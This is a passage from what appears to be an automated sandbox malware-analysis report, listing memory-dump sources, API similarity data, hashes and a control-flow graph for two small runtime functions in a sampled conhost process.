                                                      • Associated: 0000003F.00000002.296341729295.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341781098.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_63_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-3474627141
                                                      • Opcode ID: 6b47e17b8a12b31c17ff5f2ad6e06330f120307e4e61a4ac2284c96fa72ab60d
                                                      • Instruction ID: 91e3a911f83b651f4698e80430053fdc384feaeeeedb9bbeb5e2969e9f62671f
                                                      • Opcode Fuzzy Hash: 6b47e17b8a12b31c17ff5f2ad6e06330f120307e4e61a4ac2284c96fa72ab60d
                                                      • Instruction Fuzzy Hash: BDF0C271A04A4482E212EB2AB9413EAA360E74D3C1F409211FF4D532A1DF3CD1828300
                                                      Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 528 14000219e-1400021a5 529 140002272-140002280 528->529 530 1400021ab-1400021c2 EnterCriticalSection 528->530 531 140002265-14000226c LeaveCriticalSection 530->531 532 1400021c8-1400021d6 530->532 531->529 533 1400021e9-1400021f5 TlsGetValue GetLastError 532->533 534 1400021f7-1400021fa 533->534 535 1400021e0-1400021e7 533->535 534->535 536 1400021fc-140002209 534->536 535->531 535->533 536->535
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000003F.00000002.296341624581.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 0000003F.00000002.296341573800.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341671776.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341729295.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341781098.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_63_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 682475483-0
                                                      • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                      • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                      • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                      • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200